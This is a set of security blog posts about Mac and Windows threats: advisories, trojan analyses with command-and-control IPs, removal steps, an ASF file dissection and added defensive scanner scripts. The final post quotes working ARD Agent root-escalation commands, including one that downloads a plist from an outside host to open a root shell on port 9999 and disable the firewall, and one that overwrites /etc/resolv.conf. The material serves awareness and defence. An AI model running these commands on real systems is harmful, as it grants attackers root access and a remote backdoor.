Categories: Computers

0day: Apple Safari “parent.close()”

Release Date: 2010-05-07
Criticality level: Highly critical
Impact: Remote code execution
Solution Status: Unpatched

Description:
A vulnerability has been discovered in Apple Safari, which can be exploited by malicious people to compromise a user’s system.

The vulnerability is caused due to an error in the handling of parent windows and can result in a function call using an invalid pointer. This can be exploited to execute arbitrary code when a user e.g. visits a specially crafted web page and closes opened pop-up windows.

The vulnerability is confirmed in Safari version 4.0.5 for Windows. Other versions may also be affected.

Solution:
Do not visit untrusted web sites or follow links from untrusted sources.

PROVIDED AND/OR DISCOVERED BY:
Krystian Kloskowski (h07)

Original Advisory:
http://h07.w.interia.pl/Safari.rar

Advisory Reference:
http://secunia.com/advisories/39670/

Categories: Operating Systems

Mac OS X Ransomware

I just read the blog post of Dancho this morning titled Mac OS X SMS ransomware – hype or real threat?

Well, the Mac security community has been aware of this since early last month (February 03). The package we received is source code, which serves as a heads-up to security researchers of what’s to come.

Underground intelligence allowed us to obtain a copy of the code for the purpose of learning disinfection, to help protect Mac users against the possible emergence of this threat.

In January, I blogged about an observation where Blackhat SEO redirection scripts check the browser’s USER-AGENT to identify and redirect Mac user traffic, in the hope of monetizing it. Following this post, Dancho found a similar trend, where the Koobface gang is also using the USER-AGENT to redirect and monetize Mac user traffic. This trend raised awareness in the security community to investigate and learn why these guys are monitoring and interested in Mac user traffic, and we got our answer: we received the Mac OS X ransomware source code.

Now the questions,

Is it a threat to Mac users? No (not yet at the moment), but YES, this is absolutely an emerging threat on Mac.

Is it hype? No, there’s no exaggeration; instead the message should serve as awareness of this emerging threat on Mac.

However, we have to acknowledge that there are on-going offensive developments on Mac, and Mac users should not take chances.

Categories: Computers, Operating Systems

Do you use Adobe Reader?

Exploited PDFs have been a prevalent attack vector for a while now, but only on Windows, never on Mac.

I had discussed this here: the prevalence, “util.printf()”, Virut-generated PDFs and now the zero day. This zero-day vulnerability exists in Adobe Reader 9.0 and earlier and Acrobat 9.0 and earlier versions. Unfortunately, this flaw remains unpatched at the moment; as announced in the advisory, “Adobe expects to make available an update for Adobe Reader 9 and Acrobat 9 by March 11th, 2009.”

Here are a few recommendations to avoid this attack:

Mac Users:

1) Go to the Applications folder, look for Adobe Reader and launch it.

2) Once open, click “Adobe Reader” and then “Preferences”, or use the shortcut by pressing Command and comma (,).

3) In Categories, click “Internet”, look at the Web Browser options and uncheck “Display PDF in browser…”.

4) Again in Categories, click “JavaScript”, look at the JavaScript options and uncheck “Enable Acrobat JavaScript”.

5) Do not open or access PDF documents from an untrusted source, specifically if you are not expecting it.

6) Make sure your security scanner is using the latest signature update, and ensure that features like real time scanning are turned on.

For Windows users:

1) Prevent your default browser from automatically opening PDF documents. To do this, open your Adobe Reader by clicking on Start > All Programs > Adobe Reader <x> (where ‘<x>’ is the version). Once open, click Edit > Preferences, and uncheck Display PDF in Browser.

2) Disable JavaScript in Adobe Reader and Acrobat. Click Edit > Preferences and uncheck Enable Acrobat JavaScript.

3) Do not open or access PDF documents from an untrusted source, specifically if you are not expecting it.

4) Make sure your security scanner is using the latest signature update, and ensure that features like real time scanning are turned on.

Take note that this vulnerability does not require JavaScript to exploit. However, attackers crafting PDFs to get into users’ machines require script to successfully execute the payload (based on the exploited PDFs I’ve seen), so it is best to disable it!
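As an added example (not part of the original post), here is a small Python triage script that checks a PDF for the names that carry script or auto-run actions, including the #xx hex-escaped spelling sometimes used to hide /JavaScript. The sample PDF is constructed inline; the script only scans raw bytes, so anything inside compressed (FlateDecode) streams is not seen, which is why it counts those streams as a caveat.

```python
import re
import sys

# Names whose presence in a PDF warrants a closer look: embedded script and automatic actions.
SUSPECT_NAMES = ("JavaScript", "JS", "OpenAction", "AA", "Launch", "EmbeddedFile")

def normalize_names(data: bytes) -> bytes:
    """Undo #xx hex escapes inside PDF names, so /Java#53cript is seen as /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)

def count_suspect_names(data: bytes) -> dict:
    """Count each watched name; a name ends at a delimiter, so /JS must not match /JSX."""
    data = normalize_names(data)
    return {name: len(re.findall(rb"/" + name.encode() + rb"(?![0-9A-Za-z_])", data))
            for name in SUSPECT_NAMES}

def triage(data: bytes) -> dict:
    """Summarise: does the file carry script, and does anything run automatically on open?"""
    counts = count_suspect_names(data)
    return {
        "has_script": counts["JavaScript"] + counts["JS"] > 0,
        "auto_runs": counts["OpenAction"] + counts["AA"] > 0,
        "compressed_streams": len(re.findall(rb"/FlateDecode", data)),  # raw scan cannot see inside these
        "counts": counts,
    }

# Constructed minimal PDF (not a real sample): the catalog's OpenAction runs a hex-escaped JavaScript action.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /S /Java#53cript /JS (app.alert('constructed sample')) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    print(triage(open(path, "rb").read() if path else SAMPLE_PDF))
```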

Please feel free to drop by and comment if this has been helpful to you! Also, if you have found a suspicious website or file, don’t hesitate to send it to meths101 (at) optusnet (dot) com (dot) au. It will definitely help other users!

Categories: Computers

Update: “iWorkServices” Not Just A Trojan

Let’s call the bad iWork Krowi.

So, the story starts when an OS X user downloads an iWork 09 installation package with a serial key through BitTorrent.

Take note that Krowi is often found in a package “iWork09.zip” with a file size of 450.4MB. Upon extracting it, you’ll find NO “iWorkServices” here, but instead a main installation package named iWork09Trial.mpkg and an enticing serial.txt.

Upon inspecting the contents of “iWork09Trial.mpkg”, you’ll find the nasty Krowi “iWorkServices.pkg” piggybacking.

The file “preflight” contains a one-line instruction, which executes the Mach-O binary “iworkservices”.

When installed, this will create the following files:

/System/Library/StartupItems/iWorkServices/StartupParameters.plist

/System/Library/StartupItems/iWorkServices/iWorkServices

/usr/bin/iWorkServices

Since the system keeps a copy of the installer, you’ll find this as well:

/Library/Receipts/iWorkServices.pkg

Once installed, you will find the “iWorkServices” process running in the background, persistently attempting to report to its command and control channels:

69.92.177.146:59201

qwfojzlk.freehostia.com:1024

Categories: Computers

How To Remove “MacAccess” Trojan

Due to infection reports and the prevalence of this threat, here are removal instructions for the “MacAccess” trojan.

The presence of the following files indicates that the infection or installation of this tricky trojan was successful.

[screenshot: installed files]

/cron.inst
/i386
/Library/Internet Plug-Ins/AdobeFlash
/Library/Internet Plug-Ins/Mozillaplug.plugin

Please take note that the files /cron.inst and /i386 may not exist, since they usually get deleted after the trojan has successfully executed its code.

To fix the infection, simply delete any of these files.

Also, this trojan creates a cron (scheduling) job (/cron.inst) that executes a malicious Perl script named “AdobeFlash” found in “/Library/Internet Plug-Ins/”, and it is important that you check this part through Terminal. Execute “sudo crontab -l” to list the scheduled jobs, as in the example below:

***Thanks for all the feedback! To all readers: use sudo to allow a normal user to run crontab commands as root***

The cron job executes every five minutes, which triggers the backdoor to check the remote IP address. It has been observed to check these remote IP addresses:

94.247.2.109
78.157.142.187

To remove it, simply execute “sudo crontab -r” and double-check by executing “sudo crontab -l”, as in the example below:

[screenshot: output of sudo crontab -r followed by sudo crontab -l]

Take note: you have to open Terminal to run “crontab”. Terminal is located at ~/Applications/Utilities, or you can simply search for it using Spotlight, as shown below:

[screenshot: locating Terminal with Spotlight]

OSX/Jahlav, aka “MacAccess”, will attempt to connect to the mentioned IP addresses (this may vary depending on the variant), which may install another trojan, often DNSChanger. So it is best to check your DNS settings and notice whether there are dodgy entries, like IPs starting with 85.xx.xx.xx. To fix, simply remove them and restore your legitimate DNS settings. Please check this instruction to help you fix malicious DNS entries.
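As an added example (not from the original post), the following Python helper parses the output of “sudo crontab -l” and flags the pattern described above: a job firing every five minutes that runs something from /Library/Internet Plug-Ins/. The crontab text is a constructed sample; against a real machine, paste the real output into SAMPLE_CRONTAB or pass it to suspicious_cron_entries().

```python
import re

# The post describes a job that fires every five minutes and runs a script from this folder.
PLUGIN_DIR = "/Library/Internet Plug-Ins/"

def parse_crontab(text: str) -> list:
    """Turn `crontab -l` output into (schedule, command) pairs, skipping comments, blanks and VAR=value lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#@" or re.match(r"^[A-Za-z_]\w*=", line):
            continue                       # @reboot-style shortcuts are not handled here
        fields = line.split(None, 5)       # five schedule fields, then the command as one string
        if len(fields) == 6:
            entries.append((" ".join(fields[:5]), fields[5]))
    return entries

def runs_every_n_minutes(schedule: str, n: int) -> bool:
    """True for a minute field of */n or an explicit 0,n,2n,... list with every other field wildcarded."""
    minute, rest = schedule.split(" ", 1)
    if rest != "* * * *":
        return False
    if minute == f"*/{n}":
        return True
    try:
        return sorted(int(v) for v in minute.split(",")) == list(range(0, 60, n))
    except ValueError:
        return False

def suspicious_cron_entries(text: str) -> list:
    """Flag jobs that run every five minutes and invoke a file under the Internet Plug-Ins directory."""
    return [(s, c) for s, c in parse_crontab(text)
            if runs_every_n_minutes(s, 5) and PLUGIN_DIR in c]

# Constructed sample modelled on the post's description; not real captured output.
SAMPLE_CRONTAB = """# root crontab
MAILTO=""
0 3 * * * /usr/sbin/periodic daily
*/5 * * * * /usr/bin/perl "/Library/Internet Plug-Ins/AdobeFlash" >/dev/null 2>&1
"""
```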

If this instruction works, then I’ll be excited to hear your story. I’m sure any info will also help other OS X users.

If not, please feel free to drop a message, hopefully with additional information such as:

  • How did you get infected? (website?)
  • Do you still have a copy of the application you installed? If yes, please send it to this email address: meths101 (at) optusnet (dot) com (dot) au, or just send me a link where I can download it.
  • Any unusual behavior found on your computer.

Updated 5/22/2009:

– Added information about Terminal as per request.

Updated 6/10/2009:

– Added a link to How To Check Your DNS Settings

Categories: Computers, Operating Systems

Summary of ASF File Specification

Related to the recent threat infecting Windows Media files, this summary should help researchers understand how to dissect an ASF file.

But what is an ASF file?

ASF is the file format used by Windows Media. Audio and/or video content compressed with a wide variety of codecs can be stored in an ASF file and played back with Windows Media Player (provided the appropriate codecs are installed), streamed with Windows Media Services or optionally packaged with Windows Media Rights Manager. [Defined by Microsoft]

Further explanation from Wikipedia follows:

  • ASF is part of the Windows Media framework.
  • The ASF container provides a framework for digital rights management in Windows Media Audio (.WMA) and Windows Media Video (.WMV).
  • Although the ASF container format can technically include any codec, Microsoft encoding tools (including Windows Media Encoder and Windows Movie Maker) produce ASF/WMA/WMV files using the DirectX Media Objects framework.

Let’s take a closer look at the ASF top-level file structure:

Identifying ASF objects using GUIDs

GUIDs are used to uniquely identify all objects and entities within ASF files.

The following table contains the names and values of top-level ASF object GUIDs.

Name                             GUID
ASF_Header_Object                75B22630-668E-11CF-A6D9-00AA0062CE6C
ASF_Data_Object                  75B22636-668E-11CF-A6D9-00AA0062CE6C
ASF_Simple_Index_Object          33000890-E5B1-11CF-89F4-00A0C90349CB
ASF_Index_Object                 D6E229D3-35DA-11D1-9034-00A0C90349BE
ASF_Media_Object_Index_Object    FEB103F8-12AD-4C64-840F-2A1D2F7AD48C
ASF_Timecode_Index_Object        3CB73FD0-0C4A-4803-953D-EDF7B6228F0C

Note: All ASF objects and structures (including data packet headers) are stored in little-endian byte order (the inverse of network byte order).

ASF Object Structure

Let’s take the Windows sample music “Beethoven’s Symphony No. 9 (Scherzo).wma” (which can be found in your %Documents and Settings% folder) as an example.

[screenshot: hex dump of the sample .wma file, with the ASF_Header_Object, ASF_Data_Object and ASF_Simple_Index_Object GUIDs highlighted]

Take note of the ASF Header Object size: it gives the size of the header, and therefore the offset of the next object, which is the Data Object of the file.

Let’s check it…

[screenshot: hex dump of the sample file at the offset given by the Header Object size, with the top-level object GUIDs highlighted]

Identifying ASF Codec Used

As explained earlier, ASF is a container and can hold any codec.

Let’s follow the Header Object GUIDs to help us determine which codec is used in our sample file.

Name                            GUID
ASF_File_Properties_Object      8CABDCA1-A947-11CF-8EE4-00C00C205365
ASF_Stream_Properties_Object    B7DC0791-A9B7-11CF-8EE6-00C00C205365
ASF_Header_Extension_Object     5FBF03B5-A92E-11CF-8EE3-00C00C205365
ASF_Codec_List_Object           86D15240-311D-11D0-A3A4-00A0C90348F6
ASF_Script_Command_Object       1EFB1A30-0B62-11D0-A39B-00A0C90348F6
ASF_Marker_Object               F487CD01-A951-11CF-8EE6-00C00C205365

Codec List Object Definition

The Codec List Object provides user-friendly information about the codecs and formats used to encode the content found in the ASF file. The Codec List Object is represented using the following structure.

Field name             Field type    Size (bits)
Object ID              GUID          128
Object Size            QWORD         64
Reserved               GUID          128
Codec Entries Count    DWORD         32
Codec Entries          See below     Varies

Codec Entries are described in the following table.

Field name                    Field type    Size (bits)
Type                          WORD          16
Codec Name Length             WORD          16
Codec Name                    WCHAR         Varies
Codec Description Length      WORD          16
Codec Description             WCHAR         Varies
Codec Information Length      WORD          16
Codec Information             BYTE          Varies

The fields are defined as follows:

Type

Specifies the type of the codec used. Use one of the values in the following table.

Value     Meaning
0x0001    Video codec
0x0002    Audio codec
0xFFFF    Unknown codec

OK, now that we understand the ASF file structure, it’s time to check some malicious ASF files.

First things first, let’s investigate the ASF header:

Let’s follow the Header Object GUIDs to help us investigate the ASF header object:

[screenshot: hex dump of the malicious file’s Header Object, with the sub-object GUIDs from the table above highlighted]

Let’s check the next object, which is the ASF script command.  The script command object is represented using the following structure.

Field name             Field type    Size (bits)
Object ID              GUID          128
Object Size            QWORD         64
Reserved               GUID          128
Commands Count         WORD          16
Command Types Count    WORD          16
Command Types          See below     Varies
Commands               See below     Varies

This malicious ASF file contains the following Script Command Object information:

1 – ASF script command object GUID

2 – ASF script command object size which is 72 bytes

3 – ASF script commands count which is 1

4 – ASF script command type count which is 1

5 – ASF script command type length which has 0x0A value

6 – ASF script command type name which is URLANDEXIT 81

The structure of each Command Type entry is shown in the following table.

Field name                   Field type    Size (bits)
Command Type Name Length     WORD          16
Command Type Name            WCHAR         Varies

7 – ASF script command “h t t p : / / I s v b r . n e t ? t = 3 6 “

So, when a user opens this malicious ASF file (whether .WMA or .WMV), Windows Media Player reads the Header Object and consequently executes the script command, which opens a URL serving a malicious codec installer.

As Microsoft explained:

When a content owner creates an audio or a video stream, that content owner can add script commands (such as URL script commands and custom script commands) that are embedded in the stream. When the stream is played back, the script commands can trigger events in an embedded player program, or they can start your Web browser and then connect to a particular Web page. THIS BEHAVIOR IS BY DESIGN.

Unfortunately, attackers exploit this legitimate ASF feature.
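As an added example (my own code, not from the original post or from Microsoft), the Python below parses an ASF Header Object the way this post walks through it: it reads each sub-object's GUID and Object Size, decodes the Script Command Object's Command Types and Commands, and reports any URL or URLANDEXIT command a player would act on. Assumptions: the per-command layout (Presentation Time DWORD, Type Index WORD, then a WCHAR name) comes from the ASF specification rather than the tables above, and the input is a constructed minimal header from build_sample() with the Reserved GUID zeroed instead of the spec's value.

```python
import struct, uuid

# GUIDs from the page's tables, in the textual form Microsoft lists them.
ASF_HEADER_OBJECT = "75B22630-668E-11CF-A6D9-00AA0062CE6C"
ASF_SCRIPT_COMMAND_OBJECT = "1EFB1A30-0B62-11D0-A39B-00A0C90348F6"

def guid_bytes(text: str) -> bytes:
    return uuid.UUID(text).bytes_le        # ASF stores the first three GUID fields little-endian

def guid_text(raw: bytes) -> str:
    return str(uuid.UUID(bytes_le=raw)).upper()

def read_wchar(buf: bytes, off: int) -> tuple:
    """WORD character count followed by that many UTF-16LE characters; returns (text, next offset)."""
    (n,) = struct.unpack_from("<H", buf, off)
    return buf[off + 2:off + 2 + 2 * n].decode("utf-16-le"), off + 2 + 2 * n

def parse_script_command_object(buf: bytes, off: int) -> dict:
    """Object header, Reserved GUID, the two counts, then Command Types and Commands (page tables)."""
    size = struct.unpack_from("<Q", buf, off + 16)[0]
    n_cmds, n_types = struct.unpack_from("<HH", buf, off + 40)   # after GUID, size and Reserved
    p, types = off + 44, []
    for _ in range(n_types):
        name, p = read_wchar(buf, p)
        types.append(name)
    commands = []
    for _ in range(n_cmds):                # each command: Presentation Time DWORD, Type Index WORD,
        pres_ms, type_idx = struct.unpack_from("<IH", buf, p)   # then a WCHAR name (ASF spec)
        name, p = read_wchar(buf, p + 6)
        commands.append((pres_ms, types[type_idx], name))
    assert p == off + size, "Object Size does not match the parsed Script Command Object"
    return {"size": size, "types": types, "commands": commands}

def find_url_commands(data: bytes) -> list:
    """Walk the Header Object's sub-objects and return every URL / URLANDEXIT script command."""
    assert guid_text(data[:16]) == ASF_HEADER_OBJECT, "not an ASF Header Object"
    n_sub = struct.unpack_from("<I", data, 24)[0]
    p, hits = 30, []                       # 16 GUID + 8 size + 4 count + 2 reserved bytes
    for _ in range(n_sub):
        guid, size = guid_text(data[p:p + 16]), struct.unpack_from("<Q", data, p + 16)[0]
        if guid == ASF_SCRIPT_COMMAND_OBJECT:
            cmds = parse_script_command_object(data, p)["commands"]
            hits += [c for c in cmds if c[1].upper() in ("URL", "URLANDEXIT")]
        p += size                          # Object Size is the distance to the next sub-object
    return hits

def build_sample() -> bytes:
    """Constructed header with one URLANDEXIT command (not a real file; Reserved GUID zeroed)."""
    wchar = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    body = bytes(16) + struct.pack("<HH", 1, 1) + wchar("URLANDEXIT")
    body += struct.pack("<IH", 0, 0) + wchar("http://example.invalid/codec?t=1")
    sco = guid_bytes(ASF_SCRIPT_COMMAND_OBJECT) + struct.pack("<Q", 24 + len(body)) + body
    hdr = struct.pack("<IBB", 1, 1, 2) + sco
    return guid_bytes(ASF_HEADER_OBJECT) + struct.pack("<Q", 24 + len(hdr)) + hdr
```

Running find_url_commands() over a real .wma/.wmv header (the first Header Object size bytes of the file) lists the commands a player would follow before any media is decoded.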

Categories: Computers, Operating Systems

Zero Day: OS X ARD Agent Root Escalation Vulnerability

This is scary; I’ve tried it and it works perfectly… And now, a new OS X trojan is on the loose exploiting this vulnerability.

So, what is this all about? Usually, malware on Mac requires root privileges to get installed, just like DNSChanger. But in this case, by exploiting the Apple Remote Desktop (ARD) Agent vulnerability, the user can bypass this security and gain root access.

This zero-day vulnerability was actively discussed in this thread, where an anonymous reader writes:

“Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn’t switched to via fast user switching. Secure? I think not.”

And worse, another contributor in this thread divulges the real danger of this exploit.

————————————————————————————

Disconfirmed – I don’t have (and never have had) Screen Sharing enabled on Leopard 10.5.3, and this exploit works perfectly.

dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "touch /etc/somefile"'
dan@Geelong:~$ ls -lh /etc/somefile
-rw-rw-rw- 1 root wheel 0B Jun 18 14:16 /etc/somefile
dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "rm /etc/somefile"'
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory

So, how dangerous is this? Here’s an example:

osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl "'

This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (which is not enabled by default). If you run the above, you can 'nc localhost 9999' and find yourself at a root shell.

To remove, run 'launchctl unload com.apple.bash', 'launchctl unload /System/Library/LaunchDaemons/bash.plist' and then 'rm /System/Library/LaunchDaemons/bash.plist'.

It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that’s easily bypassed with a Python script.

So yeah; anything can be downloaded, and anything can be done with it. Scary.

————————————————————————————

I’ve got it to run destructive things as an ordinary user without any need for authentication beyond being logged in.

% osascript -e 'tell app "ARDAgent" to do shell script "echo Nasty Content > /etc/resolv.conf"'
% cat /etc/resolv.conf
Nasty Content

————————————————————————————

Security is like sex. Once you’re penetrated you’re ****ed. By AppleKid

@ ithreats.net